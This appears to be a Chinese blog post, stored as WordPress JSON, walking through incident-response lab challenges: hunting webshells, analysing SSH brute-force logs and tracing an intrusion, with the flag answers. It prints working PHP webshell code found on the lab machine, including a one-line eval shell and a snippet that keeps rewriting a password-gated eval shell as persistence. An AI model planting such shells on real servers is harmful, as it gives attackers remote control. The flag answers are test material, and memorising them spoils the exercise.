{"id":83,"date":"2025-05-28T19:41:30","date_gmt":"2025-05-28T11:41:30","guid":{"rendered":"http:\/\/101.201.119.158\/?p=83"},"modified":"2025-05-29T19:20:57","modified_gmt":"2025-05-29T11:20:57","slug":"%e7%8e%84%e6%9c%ba%e5%ba%94%e6%80%a5%e5%93%8d%e5%ba%94%e7%ac%ac%e4%b8%80%e7%ab%a0","status":"publish","type":"post","link":"http:\/\/101.201.119.158\/?p=83","title":{"rendered":"\u7384\u673a\u5e94\u6025\u54cd\u5e94\u7b2c\u4e00\u7ae0"},"content":{"rendered":"\n

\u5e94\u6025\u54cd\u5e94-webshell\u67e5\u6740<\/h2>\n\n\n\n
\u9776\u673a\u8d26\u53f7\u5bc6\u7801 root xjwebshell\n1.\u9ed1\u5ba2webshell\u91cc\u9762\u7684flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}\n2.\u9ed1\u5ba2\u4f7f\u7528\u7684\u4ec0\u4e48\u5de5\u5177\u7684shell github\u5730\u5740\u7684md5 flag{md5}\n3.\u9ed1\u5ba2\u9690\u85cfshell\u7684\u5b8c\u6574\u8def\u5f84\u7684md5 flag{md5} \u6ce8 : \/xxx\/xxx\/xxx\/xxx\/xxx.xxx\n4.\u9ed1\u5ba2\u514d\u6740\u9a6c\u5b8c\u6574\u8def\u5f84 md5 flag{md5}<\/pre>\n\n\n\n
\u70b9\u51fb\u8fdb\u53bb\u770b\u770b\uff0c\u5e76\u4e14\u4f7f\u7528finalshell\u8fdb\u884c\u8fdc\u7a0bssh\u8fde\u63a5\uff0c\u7136\u540e\u662fwebshell\u7684\u67e5\u6740\u7684\u8bdd\uff0c\u4e3b\u8981\u7684\u5c31\u662f\/var\/www\/html\u7684\u8def\u5f84\u4e86\uff0c\u7136\u540e\u7ed9\u4ed6\u5148\u4e0b\u8f7d\u770b\u770b\u5427\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u662f\u8981\u94b1\u7684\u3002<\/p>\n\n\n\n
flag1<\/h3>\n\n\n\n
html\u653e\u5230D\u76fe\u91cc\u9762\u8fdb\u884c\u67e5\u6740\u770b\u770b\u6709\u6ca1\u6709\u4ec0\u4e48\u6728\u9a6c\u4ec0\u4e48\u7684\uff0c\u7136\u540e\u51fa\u6765shell.php\uff0cgz.php,top.php,.Mysqli.php\u8fd9\u56db\u4e2a\u6728\u9a6c\uff0c\u7136\u540e\u4e00\u4e2a\u4e2a\u770b\u5457\uff0c\u770bgz.php\u7684\u8bdd\uff0c\u53d1\u73b0\u91cc\u9762\u5b58\u5728\u4e00\u6bb5\u7c7b\u4f3c\u4e8eflag\u7684\u5bc6\u6587\u4e86\uff0c\u7136\u540e\u5c31\u662fflag1\u4e86<\/p>\n\n\n\n
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}<\/p>\n\n\n\n
flag2<\/h3>\n\n\n\n
\u7136\u540e\u5c31\u770bgz.php\u8fd9\u4e2a\u6728\u9a6c\u91cc\u9762\u5b58\u5728\u8fd9\u6837\u7684\u5bc6\u6587<\/p>\n\n\n\n
<?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n    for($i=0;$i<strlen($D);$i++) {\n        $c = $K[$i+1&15];\n        $D[$i] = $D[$i]^$c;\n    }\n    return $D;\n}<\/code><\/pre>\n\n\n\n
\u7136\u540e\u5728\u7f51\u4e0a\u9762\u770b\u4e86\u770b\uff0c\u53d1\u73b0\u662f\u54e5\u65af\u62c9\uff0c\u7136\u540e\u5c31\u627e\u5230\u4ed6\u7684\u4e0b\u8f7d\u5730\u5740<\/p>\n\n\n\n
https:\/\/github.com\/BeichenDream\/Godzilla -> flag{39392de3218c333f794befef07ac9257}<\/pre>\n\n\n\n
flag3<\/h3>\n\n\n\n
\u9690\u85cfshell\u7684\u5b8c\u6574\u8def\u5f84\uff0c\u5728 Linux \/ macOS \/ Unix \u4e2d\uff1a\u4ee5\u201c.\u201d\u5f00\u5934\u7684\u6587\u4ef6\u4f1a\u88ab\u9ed8\u8ba4\u89c6\u4e3a\u9690\u85cf\u6587\u4ef6\uff08\u4e5f\u53eb\u201c\u70b9\u6587\u4ef6\u201d\uff09\u3002\u6240\u4ee5\u5c31\u662f.Mysqli.php\u8fd9\u4e2a\u6587\u4ef6\u4e86 \u8def\u5f84\uff1a\/var\/www\/html\/include\/Db\/.Mysqli.php<\/p>\n\n\n\n
flag{aebac0e58cd6c5fad1695ee4d1ac1919}<\/p>\n\n\n\n
flag4<\/h3>\n\n\n\n
\u514d\u6740\ud83d\udc0e\uff0c\u55ef\uff0c\u514d\u6740\u9a6c\u662f\u6307\u7ecf\u8fc7\u5904\u7406\uff0c\u80fd\u5728\u4e00\u6bb5\u7279\u6b8a\u65f6\u95f4\u5185\u7ed5\u8fc7\u5927\u90e8\u5206\u6740\u6bd2\u8f6f\u4ef6\u68c0\u6d4b\u7684\u6728\u9a6c\u7a0b\u5e8f\uff0c\u7136\u540e\u5728D\u76fe\u91cc\u9762\u5c31\u5dee\u8fd9\u4e2ashell.php\u548ctop.php\u6ca1\u6709\u4f7f\u7528\u4e86\uff0c\u7136\u540e\u5728top.php\u91cc\u9762\u8fdb\u884c\u4e86\u4e00\u4e2a\u7b80\u5355\u7684\u5b57\u7b26\u53d8\u6362\uff0c\u7136\u540eshell.php\u8fd9\u4e2a\u592a\u7b80\u5355\u4e86\uff0c\u80af\u5b9a\u4e0d\u662f\uff0c\/var\/www\/html\/wap\/top.php -> flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}<\/p>\n\n\n\n
\u5e94\u6025\u54cd\u5e94-Linux\u65e5\u5fd7\u5206\u6790<\/h2>\n\n\n\n
1.\u6709\u591a\u5c11IP\u5728\u7206\u7834\u4e3b\u673assh\u7684root\u5e10\u53f7\uff0c\u5982\u679c\u6709\u591a\u4e2a\u4f7f\u7528”,”\u5206\u5272 
2.ssh\u7206\u7834\u6210\u529f\u767b\u9646\u7684IP\u662f\u591a\u5c11\uff0c\u5982\u679c\u6709\u591a\u4e2a\u4f7f\u7528”,”\u5206\u5272 
3.\u7206\u7834\u7528\u6237\u540d\u5b57\u5178\u662f\u4ec0\u4e48\uff1f\u5982\u679c\u6709\u591a\u4e2a\u4f7f\u7528”,”\u5206\u5272 
4.\u767b\u9646\u6210\u529f\u7684IP\u5171\u7206\u7834\u4e86\u591a\u5c11\u6b21 
5.\u9ed1\u5ba2\u767b\u9646\u4e3b\u673a\u540e\u65b0\u5efa\u4e86\u4e00\u4e2a\u540e\u95e8\u7528\u6237\uff0c\u7528\u6237\u540d\u662f\u591a\u5c11<\/p><\/blockquote><\/figure>\n\n\n\n
\u65e5\u5fd7\u6587\u4ef6<\/td>\u8bb0\u5f55\u7684\u4fe1\u606f<\/td><\/tr>
\/var\/log\/cron<\/td>\u8bb0\u5f55\u4e0e\u7cfb\u7edf\u5b9a\u65f6\u4efb\u52a1\u76f8\u5173\u7684\u65e5\u5fd7<\/td><\/tr>
\/var\/log\/cups\/<\/td>\u8bb0\u5f55\u6253\u5370\u4fe1\u606f\u7684\u65e5\u5fd7<\/td><\/tr>
\/var\/log\/dmesg<\/td>\u8bb0\u5f55\u4e86\u7cfb\u7edf\u5728\u5f00\u673a\u65f6\u5185\u6838\u81ea\u68c0\u7684\u4fe1\u606f\u3002\u4e5f\u53ef\u4ee5\u4f7f\u7528dmesg\u547d\u4ee4\u76f4\u63a5\u67e5\u770b\u5185\u6838\u81ea\u68c0\u4fe1\u606f<\/td><\/tr>
\/var\/log\/btmp<\/td>\u8bb0\u5f55\u9519\u8bef\u767b\u9646\u7684\u65e5\u5fd7\u3002\u8fd9\u4e2a\u6587\u4ef6\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u4e0d\u80fd\u76f4\u63a5\u7528Vi\u67e5\u770b\uff0c\u800c\u8981\u4f7f\u7528lastb\u547d\u4ee4\u67e5\u770b\u3002\u547d\u4ee4\u5982\u4e0b\uff1a[root@localhost log]#lastb root tty1 Tue Jun 4 22:38 – 22:38 (00:00) #\u6709\u4eba\u57286\u67084\u65e522:38\u4fbf\u7528root\u7528\u6237\u5728\u672c\u5730\u7ec8\u7aef1\u767b\u9646\u9519\u8bef<\/td><\/tr>
\/var\/log\/lasllog<\/td>\u8bb0\u5f55\u7cfb\u7edf\u4e2d\u6240\u6709\u7528\u6237\u6700\u540e\u4e00\u6b21\u7684\u767b\u5f55\u65f6\u95f4\u7684\u65e5\u5fd7\u3002\u8fd9\u4e2a\u6587\u4ef6\u4e5f\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002\u4e0d\u80fd\u76f4\u63a5\u7528Vi\u67e5\u770b\uff0c\u800c\u8981\u4f7f\u7528lastlog\u547d\u4ee4\u67e5\u770b<\/td><\/tr>
\/var\/log\/maillog<\/td>\u8bb0\u5f55\u90ae\u4ef6\u4fe1\u606f\u7684\u65e5\u5fd7<\/td><\/tr>
\/var\/log\/messages<\/td>\u5b83\u662f\u6838\u5fc3\u7cfb\u7edf\u65e5\u5fd7\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u542b\u4e86\u7cfb\u7edf\u542f\u52a8\u65f6\u7684\u5f15\u5bfc\u4fe1\u606f\uff0c\u4ee5\u53ca\u7cfb\u7edf\u8fd0\u884c\u65f6\u7684\u5176\u4ed6\u72b6\u6001\u6d88\u606f\u3002I\/O\u9519\u8bef\u3001\u7f51\u7edc\u9519\u8bef\u548c\u5176\u4ed6\u7cfb\u7edf\u9519\u8bef\u90fd\u4f1a\u8bb0\u5f55\u5230\u6b64\u6587\u4ef6\u4e2d\u3002\u5176\u4ed6\u4fe1\u606f\uff0c\u6bd4\u5982\u67d0\u4eba\u7684\u8eab\u4efd\u5207\u6362\u4e3aroot\uff0c\u5df2\u7ecf\u7528\u6237\u81ea\u5b9a\u4e49\u5b89\u88c5\u8f6f\u4ef6\u7684\u65e5\u5fd7\uff0c\u4e5f\u4f1a\u5728\u8fd9\u91cc\u5217\u51fa\u3002<\/td><\/tr>
\/var\/log\/secure<\/td>\u8bb0\u5f55\u9a8c\u8bc1\u548c\u6388\u6743\u65b9\u9762\u7684\u4fe1\u606f\uff0c\u53ea\u8981\u6d89\u53ca\u8d26\u6237\u548c\u5bc6\u7801\u7684\u7a0b\u5e8f\u90fd\u4f1a\u8bb0\u5f55\uff0c\u6bd4\u5982\u7cfb\u7edf\u7684\u767b\u5f55\u3001ssh\u7684\u767b\u5f55\u3001su\u5207\u6362\u7528\u6237\uff0csudo\u6388\u6743\uff0c\u751a\u81f3\u6dfb\u52a0\u7528\u6237\u548c\u4fee\u6539\u7528\u6237\u5bc6\u7801\u90fd\u4f1a\u8bb0\u5f55\u5728\u8fd9\u4e2a\u65e5\u5fd7\u6587\u4ef6\u4e2d<\/td><\/tr>
\/var\/log\/wtmp<\/td>\u6c38\u4e45\u8bb0\u5f55\u6240\u6709\u7528\u6237\u7684\u767b\u9646\u3001\u6ce8\u9500\u4fe1\u606f\uff0c\u540c\u65f6\u8bb0\u5f55\u7cfb\u7edf\u7684\u542f\u52a8\u3001\u91cd\u542f\u3001\u5173\u673a\u4e8b\u4ef6\u3002\u540c\u6837\uff0c\u8fd9\u4e2a\u6587\u4ef6\u4e5f\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002\u4e0d\u80fd\u76f4\u63a5\u7528Vi\u67e5\u770b\uff0c\u800c\u8981\u4f7f\u7528last\u547d\u4ee4\u67e5\u770b<\/td><\/tr>
\/var\/tun\/ulmp<\/td>\u8bb0\u5f55\u5f53\u524d\u5df2\u7ecf\u767b\u5f55\u7684\u7528\u6237\u7684\u4fe1\u606f\u3002\u8fd9\u4e2a\u6587\u4ef6\u4f1a\u968f\u7740\u7528\u6237\u7684\u767b\u5f55\u548c\u6ce8\u9500\u800c\u4e0d\u65ad\u53d8\u5316\uff0c\u53ea\u8bb0\u5f55\u5f53\u524d\u767b\u5f55\u7528\u6237\u7684\u4fe1\u606f\u3002\u540c\u6837\uff0c\u8fd9\u4e2a\u6587\u4ef6\u4e0d\u80fd\u76f4\u63a5\u7528Vi\u67e5\u770b\uff0c\u800c\u8981\u4f7f\u7528w\u3001who\u3001users\u7b49\u547d\u4ee4\u67e5\u770b<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u5f53\u7136\uff0c\u65e5\u5fd7\u91cc\u9762\u6700\u5e38\u7528\u7684\u5c31\u662fauth.log<\/strong><\/p>\n\n\n\n
\u767b\u5f55\u548c\u6ce8\u9500\u6d3b\u52a8<\/strong><\/td>\u6210\u529f\u548c\u5931\u8d25\u7684\u767b\u5f55\u5c1d\u8bd5
\u7528\u6237\u6ce8\u9500\u4e8b\u4ef6<\/strong><\/td><\/tr>
\u8ba4\u8bc1\u8fc7\u7a0b<\/strong><\/td>SSH \u767b\u5f55\u5c1d\u8bd5\uff08\u6210\u529f\u548c\u5931\u8d25\uff09
\u672c\u5730\u63a7\u5236\u53f0\u767b\u5f55
Sudo \u63d0\u6743\u4e8b\u4ef6\uff08\u6210\u529f\u548c\u5931\u8d25\uff09<\/strong><\/td><\/tr>
\u5b89\u5168\u4e8b\u4ef6<\/strong><\/td>\u65e0\u6548\u7684\u767b\u5f55\u5c1d\u8bd5
\u9519\u8bef\u7684\u5bc6\u7801\u8f93\u5165
\u9501\u5b9a\u548c\u89e3\u9501\u5c4f\u5e55\u4e8b\u4ef6<\/strong><\/td><\/tr>
\u7cfb\u7edf\u8d26\u6237\u6d3b\u52a8<\/strong><\/td>\u7528\u6237\u6dfb\u52a0\u3001\u5220\u9664\u548c\u4fee\u6539
\u7ec4\u6dfb\u52a0\u3001\u5220\u9664\u548c\u4fee\u6539<\/strong><\/td><\/tr>
PAM\uff08Pluggable Authentication Modules\uff09\u76f8\u5173\u4fe1\u606f<\/strong><\/td>\u5404\u79cd PAM \u6a21\u5757\u7684\u65e5\u5fd7\u8f93\u51fa\uff0c\u5305\u62ec\u8ba4\u8bc1\u548c\u4f1a\u8bdd\u7ba1\u7406<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u9996\u5148\u65e2\u7136\u662f\u65e5\u5fd7\u7684\u8bdd\uff0c\u5148\u4e0b\u8f7dlog,\u7136\u540e\u5728debian\u4e2d\uff0cssh\u767b\u5f55\u65e5\u5fd7\u901a\u5e38\u4fdd\u5b58\u5728\/var\/log\/auth.log<\/code><\/p>\n\n\n\n
flag1<\/h3>\n\n\n\n
\u6709\u591a\u5c11ip\u5728\u7206\u7834\u5bc6\u7801\uff0c\u55ef\uff0c<\/p>\n\n\n\n
cat auth.log.1|grep -a \"Failed password for root\" \/\/\u67e5\u770bauth.log.1\u8fd9\u4e2a\u65e5\u5fd7\u91cc\u9762\u7684\u5185\u5bb9\u5e76\u4e14\u628a\u5176\u5f53\u6210\u6587\u672c\u6765\u770b\u5e76\u4e14\u51fa\u6765\u91cc\u9762\u542b\u6709Failed password for root\u7684\u5185\u5bb9<\/pre>\n\n\n\n
Aug  1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2\nAug  1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2\nAug  1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2\nAug  1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2\nAug  1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2\nAug  1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2\n<\/code><\/pre>\n\n\n\n
3\u4e2aip\uff0c\u76f4\u63a5flag{192.168.200.2,192.168.200.31,192.168.200.32}<\/p>\n\n\n\n
flag2<\/h3>\n\n\n\n
\u767b\u5f55\u6210\u529f\u7684\u8d26\u53f7 cat auth.log.1|grep -a “Accepted”<\/p>\n\n\n\n
Aug  1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2\nAug  1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2\n<\/code><\/pre>\n\n\n\n
\u51fa\u6765\u4e86ip flag{192.168.200.2}<\/p>\n\n\n\n
flag3<\/h3>\n\n\n\n
\u67e5\u770b\u7528\u6237\u4f7f\u7528\u7684\u5b57\u5178<\/p>\n\n\n\n
cat auth.log.1|grep -a \"Failed password\"| grep -o 'for .* from'|uniq -c|sort -nr<\/pre>\n\n\n\n
5 for invalid user user from\n      5 for invalid user hello from\n      5 for invalid user  from\n      4 for root from\n      1 for root from\n      1 for root from\n      1 for invalid user test3 from\n      1 for invalid user test2 from\n      1 for invalid user test1 from<\/code><\/pre>\n\n\n\n
flag{user,hello,root,test3,test2,test1}<\/p>\n\n\n\n
flag4<\/h3>\n\n\n\n
\u67e5\u770bip\u767b\u5f55\u6210\u529f\u7684\u6b21\u6570\u7684\u8bdd\uff0ccat auth.log.1|grep -a “192.168.200.2”|grep “for root” \u4e0d\u8fc7\u8981\u8bb0\u5f97\u627e\u6709”Accept”\u7684\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u662f\u6210\u529f\u7684\u767b\u5f55\uff0c\u6240\u4ee5 flag{4}<\/p>\n\n\n\n
flag5<\/h3>\n\n\n\n
\u65b0\u7684\u7528\u6237\u540d\uff0c\u55ef<\/p>\n\n\n\n
cat auth.log.1 |grep -a “new user”<\/p>\n\n\n\n
 flag{test2}<\/p>\n\n\n\n
\u5e94\u6025\u54cd\u5e94- Linux\u5165\u4fb5\u6392\u67e5<\/h2>\n\n\n\n
1.web\u76ee\u5f55\u5b58\u5728\u6728\u9a6c\uff0c\u8bf7\u627e\u5230\u6728\u9a6c\u7684\u5bc6\u7801\u63d0\u4ea4
2.\u670d\u52a1\u5668\u7591\u4f3c\u5b58\u5728\u4e0d\u6b7b\u9a6c\uff0c\u8bf7\u627e\u5230\u4e0d\u6b7b\u9a6c\u7684\u5bc6\u7801\u63d0\u4ea4
3.\u4e0d\u6b7b\u9a6c\u662f\u901a\u8fc7\u54ea\u4e2a\u6587\u4ef6\u751f\u6210\u7684\uff0c\u8bf7\u63d0\u4ea4\u6587\u4ef6\u540d
4.\u9ed1\u5ba2\u7559\u4e0b\u4e86\u6728\u9a6c\u6587\u4ef6\uff0c\u8bf7\u627e\u51fa\u9ed1\u5ba2\u7684\u670d\u52a1\u5668ip\u63d0\u4ea4
5.\u9ed1\u5ba2\u7559\u4e0b\u4e86\u6728\u9a6c\u6587\u4ef6\uff0c\u8bf7\u627e\u51fa\u9ed1\u5ba2\u670d\u52a1\u5668\u5f00\u542f\u7684\u76d1\u7aef\u53e3\u63d0\u4ea4<\/pre>\n\n\n\n
\u7136\u540e\u56e0\u4e3a\u662f\u5165\u4fb5\u6392\u67e5\u7684\u8bdd\uff0c\u5c31\u8981\u4e0b\u8f7d\/var\/www\u76ee\u5f55\u548c\/var\/log\u8fd9\u4e24\u4e2a\u76ee\u5f55\u4e86<\/p>\n\n\n\n
flag1<\/h3>\n\n\n\n
\u5b58\u5728\u6728\u9a6c\uff0c\u76f4\u63a5\u628awww\u76ee\u5f55\u653e\u5230D\u76fe\u91cc\u9762\u8fdb\u884c\u626b\u63cf\uff0c\u51fa\u73b0.shell.php\u548c1.php\u548c1.tar\u548cindex.php<\/p>\n\n\n\n
\u7136\u540e\u8981\u627e\u5230\u6728\u9a6c\u7684\u5bc6\u7801\uff0c\u57281.php\u91cc\u9762\u53d1\u73b0<\/p>\n\n\n\n
<?php eval($_POST[1]);?><\/pre>\n\n\n\n
\u5bc6\u7801\u5c31\u662f1\u4e86(\u6765\u81eaweb\u624b\u7684\u80af\u5b9a) -> flag{1}<\/p>\n\n\n\n
flag2<\/h3>\n\n\n\n
\u8981\u627e\u5230\u4e0d\u6b7b\ud83d\udc0e\u7684\u8bdd\uff0c\u8981\u5148\u77e5\u9053\u4ec0\u4e48\u662f\u4e0d\u6b7b\ud83d\udc0e\uff0c\u4e0d\u6b7b\ud83d\udc0e\u5c31\u662f\u7531\u5ba2\u6237\u7aef\u53d1\u8d77\u7684Web\u8bf7\u6c42\u540e\uff0c\u4e2d\u95f4\u4ef6\u7684\u5404\u4e2a\u72ec\u7acb\u7684\u7ec4\u4ef6\u5982Listener<\/code>\u3001Filter<\/code>\u3001Servlet<\/code>\u7b49\u7ec4\u4ef6\u4f1a\u5728\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\u505a\u76d1\u542c\u3001\u5224\u65ad\u3001\u8fc7\u6ee4\u7b49\u64cd\u4f5c\uff0c\u5185\u5b58\u9a6c\u5c31\u662f\u5229\u7528\u8bf7\u6c42\u8fc7\u7a0b\u5728\u5185\u5b58\u4e2d\u4fee\u6539\u5df2\u6709\u7684\u7ec4\u4ef6\u6216\u52a8\u6001\u6ce8\u518c\u4e00\u4e2a\u65b0\u7684\u7ec4\u4ef6\uff0c\u63d2\u5165\u6076\u610f\u7684shellcode<\/code>\uff0c\u8fbe\u5230\u6301\u4e45\u5316\u63a7\u5236\u670d\u52a1\u5668\u7684\u76ee\u7684\uff0c\u55ef\u3002\u5c31\u662f\u901a\u8fc7\u5c06\u5c0f\ud83d\udc0e\u4e0d\u65ad\u4f20\u5165\u5230\u53ef\u80fd\u68c0\u67e5\u4e0d\u5230\u7684\u5730\u65b9\uff0c\u5e76\u4e14\u6301\u7eed\u8fdb\u884c\u5165\u4fb5<\/p>\n\n\n\n
\u800c\u5728index.php\u91cc\u9762\u53d1\u73b0\u4e0b\u9762\u7684\u8bdd<\/p>\n\n\n\n
$file = '\/var\/www\/html\/.shell.php';
$code = '<?php if(md5($_POST[\"pass\"])==\"5d41402abc4b2a76b9719d911017c592\"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);<\/pre>\n\n\n\n
\u4e0d\u65ad\u5c06\u5c0f\ud83d\udc0e\u4f20\u5230.shell.php\u91cc\u9762\uff0c\u90a3\u4e48\u4e0d\u6b7b\ud83d\udc0e\u5c31\u51fa\u6765\u4e86 5d41402abc4b2a76b9719d911017c592 -> flag{hello}<\/p>\n\n\n\n
flag3<\/h3>\n\n\n\n
\u4ea7\u751f\u4e0d\u6b7b\ud83d\udc0e\u7684\u6587\u4ef6\uff0c\u5c31\u662findex.php\u4e86\uff0c\u6240\u4ee5flag{index.php}<\/p>\n\n\n\n
flag4+flag5<\/h3>\n\n\n\n
\u8fd9\u91cc\u53c2\u8003sun\u5e08\u5085\u7684\uff0c\u76f4\u63a5\u653e\u5230\u4e91\u6c99\u76d2\u91cc\u9762\u5206\u6790\u51fa\u6765\u9ed1\u5ba2\u7684ip flag{10.11.55.21}\u4ee5\u53ca\u7aef\u53e3flag{3333}<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5e94\u6025\u54cd\u5e94-webshell\u67e5\u6740 \u9776\u673a\u8d26\u53f7\u5bc6\u7801 root xjwebshell 1.\u9ed1\u5ba2webshell\u91cc\u9762\u7684f […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-83","post","type-post","status-publish","format-standard","hentry","category-4"],"_links":{"self":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/83","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=83"}],"version-history":[{"count":6,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/83\/revisions"}],"predecessor-version":[{"id":97,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/83\/revisions\/97"}],"wp:attachment":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=83"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=83"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=83"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}